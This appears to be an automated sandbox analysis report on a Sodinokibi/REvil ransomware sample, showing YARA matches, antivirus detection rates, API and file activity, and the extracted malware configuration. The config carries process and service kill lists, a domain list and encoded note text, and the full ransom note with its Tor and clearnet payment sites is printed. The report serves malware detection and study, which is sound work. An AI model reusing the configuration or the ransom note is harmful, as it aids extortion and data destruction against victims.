AHQAaQBuAGcAIABiAGUAbgBlAGYAaQB0AHMALgAgAEkAZgAgAHcAZQAgAGQAbwAgAG4AbwB0ACAAZABvACAAbwB1AHIAIAB3AG8AcgBrACAAYQBuAGQAIABsAGkAYQBiAGkAbABpAHQAaQBlAHMAIAAtACAAbgBvAGIAbwBkAHkAIAB3AGkAbABsACAAbgBvAHQAIABjAG8AbwBwAGUAcgBhAHQAZQAgAHcAaQB0AGgAIAB1AHMALgAgAEkAdABzACAAbgBvAHQAIABpAG4AIABvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzAC4ADQAKAFQAbwAgAGMAaABlAGMAawAgAHQAaABlACAAYQBiAGkAbABpAHQAeQAgAG8AZgAgAHIAZQB0AHUAcgBuAGkAbgBnACAAZgBpAGwAZQBzACwAIABZAG8AdQAgAHMAaABvAHUAbABkACAAZwBvACAAdABvACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlAC4AIABUAGgAZQByAGUAIAB5AG8AdQAgAGMAYQBuACAAZABlAGMAcgB5AHAAdAAgAG8AbgBlACAAZgBpAGwAZQAgAGYAbwByACAAZgByAGUAZQAuACAAVABoAGEAdAAgAGkAcwAgAG8AdQByACAAZwB1AGEAcgBhAG4AdABlAGUALgANAAoASQBmACAAeQBvAHUAIAB3AGkAbABsACAAbgBvAHQAIABjAG8AbwBwAGUAcgBhAHQAZQAgAHcAaQB0AGgAIABvAHUAcgAgAHMAZQByAHYAaQBjAGUAIAAtACAAZgBvAHIAIAB1AHMALAAgAGkAdABzACAAZABvAGUAcwAgAG4AbwB0ACAAbQBhAHQAdABlAHIALgAgAEIAdQB0ACAAeQBvAHUAIAB3AGkAbABsACAAbABvAHMAZQAgAHkAbwB1AHIAIAB0AGkAbQBlACAAYQBuAGQAIABkAGEAdABhACwAIABjAGEAdQBzAGUAIABqAHUAcwB0ACAAdwBlACAAaABhAHYAZQAgAHQAaABlACAAcAByAGkAdgBhAHQAZQAgAGsAZQB5AC4AIABJAG4AIABwAHIAYQBjAHQAaQBzAGUAIAAtACAAdABpAG0AZQAgAGkAcwAgAG0AdQBjAGgAIABtAG8AcgBlACAAdgBhAGwAdQBhAGIAbABlACAAdABoAGEAbgAgAG0AbwBuAGUAeQAuAA0ACgANAAoAWwArAF0AIABIAG8AdwAgAHQAbwAgAGcAZQB0ACAAYQBjAGMAZQBzAHMAIABvAG4AIAB3AGUAYgBzAGkAdABlAD8AIABbACsAXQANAAoADQAKAFkAbwB1ACAAaABhAHYAZQAgAHQAdwBvACAAdwBhAHkAcwA6AA0ACgANAAoAMQApACAAWwBSAGUAYwBvAG0AbQBlAG4AZABlAGQAXQAgAFUAcwBpAG4AZwAgAGEAIABUAE8AUgAgAGIAcgBvAHcAcwBlAHIAIQANAAoAIAAgAGEAKQAgAEQAbwB3AG4AbABvAGEAZAAgAGEAbgBkACAAaQBuAHMAdABhAGwAbAAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAgAGYAcgBvAG0AIAB0AGgAaQBzACAAcwBpAHQAZQA6ACAAaAB0AHQAcABzADoALwAvAHQAbwByAHAAcgBvAGoAZQBjAHQALgBvAHIAZwAvAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBhAHAAbABlAGIAegB1ADQANwB3AGcAYQB6AGEAcABkAHEAawBzADYAdgByAGMAdgA2AHoAYwBuAGoAcABwAGsAYgB4AGIAcgA2AHcAawBlAHQAZgA1ADYAbgBmADYAYQBxADIAbgBtAHkAbwB5AGQALgBvAG4AaQBvAG4ALwB7AFUASQBEAH0ADQAKAA0ACgAyACkAIABJAGYAIABUAE8AUgAgAGIAbABvAGMAawBlAGQAIABpAG4AIAB5AG8AdQByACAAYwBvAHUAbgB0AHIAeQAsACAAdAByAHkAIAB0AG8AIAB1AHMAZQAgAFYAUABOACEAIABCAHUAdAAgAHkAbwB1ACAAYwBhAG4AIAB1AHMAZQAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlAC4AIABGAG8AcgAgAHQAaABpAHMAOgANAAoAIAAgAGEAKQAgAE8AcABlAG4AIAB5AG8AdQByACAAYQBuAHkAIABiAHIAbwB3AHMAZQByACAAKABDAGgAcgBvAG0AZQAsACAARgBpAHIAZQBmAG8AeAAsACAATwBwAGUAcgBhACwAIABJAEUALAAgAEUAZABnAGUAKQANAAoAIAAgAGIAKQAgAE8AcABlAG4AIABvAHUAcgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBkAGUAYwByAHkAcAB0AG8AcgAuAGMAYwAvAHsAVQBJAEQAfQANAAoADQAKAFcAYQByAG4AaQBuAGcAOgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQAgAGMAYQBuACAAYgBlACAAYgBsAG8AYwBrAGUAZAAsACAAdABoAGEAdABzACAAdwBoAHkAIABmAGkAcgBzAHQAIAB2AGEAcgBpAGEAbgB0ACAAbQB1AGMAaAAgAGIAZQB0AHQAZQByACAAYQBuAGQAIABtAG8AcgBlACAAYQB2AGEAaQBsAGEAYgBsAGUALgANAAoADQAKAFcAaABlAG4AIAB5AG8AdQAgAG8AcABlAG4AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALAAgAHAAdQB0ACAAdABoAGUAIABmAG8AbABsAG8AdwBpAG4AZwAgAGQAYQB0AGEAIABpAG4AIAB0AGgAZQAgAGkAbgBwAHUAdAAgAGYAbwByAG0AOgANAAoASwBlAHkAOgANAAoADQAKAA0ACgB7AEsARQBZAH0ADQAKAA0ACgANAAoALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAA0ACgANAAoAIQAhACEAIABEAEEATgBHAEUAUgAgACEAIQAhAA0ACgBEAE8ATgBUACAAdAByAHkAIAB0AG8AIABjAGgAYQBuAGcAZQAgAGYAaQBsAGUAcwAgAGIAeQAgAHkAbwB1AHIAcwBlAGwAZgAsACAARABPAE4AVAAgAHUAcwBlACAAYQBuAHkAIAB0AGgAaQByAGQAIABwAGEAcgB0AHkAIABzAG8AZgB0AHcAYQByAGUAIABmAG8AcgAgAHIAZQBzAHQAbwByAGkAbgBnACAAeQBvAHUAcgAgAGQAYQB0AGEAIABvAHIAIABhAG4AdABpAHYAaQByAHUAcwAgAHMAbwBsAHUAdABpAG8AbgBzACAALQAgAGkAdABzACAAbQBhAHkAIABlAG4AdABhAGkAbAAgAGQAYQBtAGcAZQAgAG8AZgAgAHQAaABlACAAcAByAGkAdgBhAHQAZQAgAGsAZQB5ACAAYQBuAGQALAAgAGEAcwAgAHIAZQBzAHUAbAB0ACwAIABUAGgAZQAgAEwAbwBzAHMAIABhAGwAbAAgAGQAYQB0AGEALgANAAoAIQAhACEAIAAhACEAIQAgACEAIQAhAA0ACgBPAE4ARQAgAE0ATwBSAEUAIABUAEkATQBFADoAIABJAHQAcwAgAGkAbgAgAHkAbwB1AHIAIABpAG4AdABlAHIAZQBzAHQAcwAgAHQAbwAgAGcAZQB0ACAAeQBvAHUAcgAgAGYAaQBsAGUAcwAgAGIAYQBjAGsALgAgAEYAcgBvAG0AIABvAHUAcgAgAHMAaQBkAGUALAAgAHcAZQAgACgAdABoAGUAIABiAGUAcwB0ACAAcwBwAGUAYwBpAGEAbABpAHMAdABzACkAIABtAGEAawBlACAAZQB2AGUAcgB5AHQAaABpAG4AZwAgAGYAbwByACAAcgBlAHMAdABvAHIAaQBuAGcALAAgAGIAdQB0ACAAcABsAGUAYQBzAGUAIABzAGgAbwB1AGwAZAAgAG4AbwB0ACAAaQBuAHQAZQByAGYAZQByAGUALgANAAoAIQAhACEAIAAhACEAIQAgACEAIQAhAAAA", "et": 0, "wipe": true, "wfld": ["backup"], "rdmcnt": 0, "nname": "{EXT}-readme.txt", "pk": "PcGaG/OPoFiNzu1LUC2Qhz905YYQChX9SFo+MuXEV2M=", "net": false, "exp": false, "arn": false}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Sample_5fba9b06c7da400016eb6275.exeMAL_RANSOM_REvil_Oct20_1Detects REvil ransomwareFlorian Roth
  • 0x4d44:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
  • 0x99c6:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
  • 0x9fb2:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
  • 0x91eb:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
  • 0x99b5:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.348277768.0000000002B4F000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
    00000000.00000003.348165108.0000000002B4F000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
      00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmpMAL_RANSOM_REvil_Oct20_1Detects REvil ransomwareFlorian Roth
      • 0x4944:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
      • 0x95c6:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
      • 0x9bb2:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
      • 0x8deb:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
      • 0x95b5:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F
      00000000.00000000.347800253.00000000009B1000.00000020.00020000.sdmpMAL_RANSOM_REvil_Oct20_1Detects REvil ransomwareFlorian Roth
      • 0x4944:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
      • 0x95c6:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
      • 0x9bb2:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
      • 0x8deb:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
      • 0x95b5:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F
      Process Memory Space: Sample_5fba9b06c7da400016eb6275.exe PID: 7020JoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.0.Sample_5fba9b06c7da400016eb6275.exe.9b0000.0.unpackMAL_RANSOM_REvil_Oct20_1Detects REvil ransomwareFlorian Roth
        • 0x4d44:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
        • 0x99c6:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
        • 0x9fb2:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
        • 0x91eb:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
        • 0x99b5:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F
        0.2.Sample_5fba9b06c7da400016eb6275.exe.9b0000.1.unpackMAL_RANSOM_REvil_Oct20_1Detects REvil ransomwareFlorian Roth
        • 0x4d44:$op1: 0F 8C 74 FF FF FF 33 C0 5F 5E 5B 8B E5 5D C3 8B
        • 0x99c6:$op2: 8D 85 68 FF FF FF 50 E8 2A FE FF FF 8D 85 68 FF
        • 0x9fb2:$op3: 89 4D F4 8B 4E 0C 33 4E 34 33 4E 5C 33 8E 84
        • 0x91eb:$op4: 8D 85 68 FF FF FF 50 E8 05 06 00 00 8D 85 68 FF
        • 0x99b5:$op5: 8D 85 68 FF FF FF 56 57 FF 75 0C 50 E8 2F

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus / Scanner detection for submitted sampleShow sources
        Source: Sample_5fba9b06c7da400016eb6275.exeAvira: detected
        Found malware configurationShow sources
        Source: Sample_5fba9b06c7da400016eb6275.exe.7020.0.memstrMalware Configuration Extractor: Sodinokibi {"prc": ["firefox", "oracle", "visio", "xfssvccon", "steam", "winword", "mspub", "isqlplussvc", "ocssd", "ocautoupds", "mydesktopqos", "outlook", "dbeng50", "sql", "agntsvc", "tbirdconfig", "encsvc", "thebat", "synctime", "onenote", "mydesktopservice", "thunderbird", "excel", "powerpnt", "dbsnmp", "sqbcoreservice", "ocomm", "infopath", "wordpad", "msaccess"], "sub": "5891", "svc": ["veeam", "vss", "backup", "sophos", "svc$", "mepocs", "memtas", "sql"], "wht": {"ext": ["msc", "mpa", "hta", "ani", "themepack", "com", "ps1", "icl", "dll", "ldf", "ocx", "lnk", "theme", "nls", "386", "cmd", "wpx", "diagcfg", "cur", "prf", "ico", "nomedia", "sys", "bat", "exe", "deskthemepack", "spl", "shs", "hlp", "rtp", "msp", "scr", "ics", "key", "msstyles", "mod", "cab", "diagcab", "adv", "rom", "drv", "bin", "msi", "idx", "cpl", "diagpkg", "msu", "icns", "lock"], "fls": ["boot.ini", "bootsect.bak", "bootfont.bin", "ntuser.ini", "iconcache.db", "ntuser.dat.log", "desktop.ini", "autorun.inf", "thumbs.db", "ntuser.dat", "ntldr"], "fld": ["system volume information", "program files (x86)", "mozilla", "application data", "windows.old", "msocache", "appdata", "$recycle.bin", "$windows.~ws", "program files", "windows", "programdata", "google", "tor browser", "perflogs", "boot", "intel", "$windows.~bt"]}, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA", "dmn": "notmissingout.com;employeesurveys.com;delchacay.com.ar;sw1m.ru;sofavietxinh.com;samnewbyjax.com;pawsuppetlovers.com;panelsandwichmadrid.es;frontierweldingllc.com;antenanavi.com;nokesvilledentistry.com;partnertaxi.sk;tomaso.gr;levihotelspa.fi;myhealth.net.au;midmohandyman.com;kirkepartner.dk;zewatchers.com;lapmangfpt.info.vn;purposeadvisorsolutions.com;fitnessbazaar.com;brigitte-erler.com;lescomtesdemean.be;supportsumba.nl;deltacleta.cat;mastertechusering.com;dontpassthepepper.com;apprendrelaudit.com;whittier5k.com;ladelirante.fr;mariposapropaneaz.com;nsec.se;shsthepapercut.com;adoptioperheet.fi;labobit.it;retroearthstudio.com;ahouseforlease.com;greenfieldoptimaldentalcare.com;renergysolution.com;xtptrack.com;sandd.nl;euro-trend.pl;christ-michael.net;bigasgrup.com;plv.media;wacochamber.com;jyzdesign.com;facettenreich27.de;echtveilig.nl;mbxvii.com;igfap.com;noskierrenteria.com;strategicstatements.com;itelagen.com;burkert-ideenreich.de;cleliaekiko.online;baronloan.org;slwgs.org;wolf-glas-und-kunst.de;hardinggroup.com;mousepad-direkt.de;4youbeautysalon.com;suncrestcabinets.ca;zzyjtsgls.com;commercialboatbuilding.com;stemenstilte.nl;maasreusel.nl;bloggyboulga.net;vitavia.lt;skanah.com;autodujos.lt;leoben.at;filmstreamingvfcomplet.be;mediaplayertest.net;travelffeine.com;ungsvenskarna.se;securityfmm.com;rushhourappliances.com;ziegler-praezisionsteile.de;drinkseed.com;live-your-life.jp;deko4you.at;comarenterprises.com;despedidascosta
        Multi AV Scanner detection for submitted fileShow sources
        Source: Sample_5fba9b06c7da400016eb6275.exeVirustotal: Detection: 89%Perma Link
        Source: Sample_5fba9b06c7da400016eb6275.exeMetadefender: Detection: 48%Perma Link
        Source: Sample_5fba9b06c7da400016eb6275.exeReversingLabs: Detection: 86%
        Machine Learning detection for sampleShow sources
        Source: Sample_5fba9b06c7da400016eb6275.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B549C CryptAcquireContextW,CryptGenRandom,0_2_009B549C
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B5D90 CryptBinaryToStringW,CryptBinaryToStringW,0_2_009B5D90
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B5D2F CryptStringToBinaryW,CryptStringToBinaryW,0_2_009B5D2F
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: d:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: b:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: e:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: c:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile opened: a:Jump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B766A FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_009B766A

        Networking:

        barindex
        Found Tor onion addressShow sources
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
        Source: su84mu33c1-readme.txt19.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmpString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, su84mu33c1-readme.txt19.0.drString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmpString found in binary or memory: http://decryptor.cc/
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, su84mu33c1-readme.txt19.0.drString found in binary or memory: http://decryptor.cc/A7014F8C2779026F
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.577730714.0000000002B58000.00000004.00000040.sdmp, Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000003.524083890.0000000002B6F000.00000004.00000040.sdmp, su84mu33c1-readme.txt19.0.drString found in binary or memory: https://torproject.org/
        Source: Sample_5fba9b06c7da400016eb6275.exe, 00000000.00000002.573901385.0000000000BBA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        Spam, unwanted Advertisements and Ransom Demands:

        barindex
        Found ransom note / readmeShow sources
        Source: C:\su84mu33c1-readme.txtDropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.[+] How to get access on website? [+]You have two ways:1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A7014F8C2779026F2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A7014F8C2779026FWarning: secondary website can be blocked, thats why first variant mucJump to dropped file
        Yara detected Sodinokibi RansomwareShow sources
        Source: Yara matchFile source: 00000000.00000003.348277768.0000000002B4F000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.348165108.0000000002B4F000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: Sample_5fba9b06c7da400016eb6275.exe PID: 7020, type: MEMORY
        Modifies existing user documents (likely ransomware behavior)Show sources
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile moved: C:\Users\user\Desktop\ZTGJILHXQB\QCFWYSKMHA.pngJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile deleted: C:\Users\user\Desktop\ZTGJILHXQB\QCFWYSKMHA.pngJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile moved: C:\Users\user\Desktop\UOOJJOZIRH.xlsxJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile deleted: C:\Users\user\Desktop\UOOJJOZIRH.xlsxJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile moved: C:\Users\user\Desktop\PWCCAWLGRE.jpgJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B3B6E OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_009B3B6E
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009BB7A20_2_009BB7A2
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B8AF80_2_009B8AF8
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B85D50_2_009B85D5
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009BAB0D0_2_009BAB0D
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B83770_2_009B8377
        Source: Sample_5fba9b06c7da400016eb6275.exe, type: SAMPLEMatched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
        Source: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, type: MEMORYMatched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
        Source: 00000000.00000000.347800253.00000000009B1000.00000020.00020000.sdmp, type: MEMORYMatched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
        Source: 0.0.Sample_5fba9b06c7da400016eb6275.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
        Source: 0.2.Sample_5fba9b06c7da400016eb6275.exe.9b0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
        Source: classification engineClassification label: mal100.rans.evad.winEXE@2/207@0/0
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B4CD4 GetDriveTypeW,GetDiskFreeSpaceExW,0_2_009B4CD4
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeCode function: 0_2_009B5425 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_009B5425
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\program files\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: c:\users\su84mu33c1-readme.txtJump to behavior
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeMutant created: \Sessions\1\BaseNamedObjects\Global\C67C4A76-40FA-FD1C-B814-F8203DB0F283
        Source: C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exeFile created: C:\Users\user\AppData\Local\Temp\xa288w44oi.bmpJump to behavior
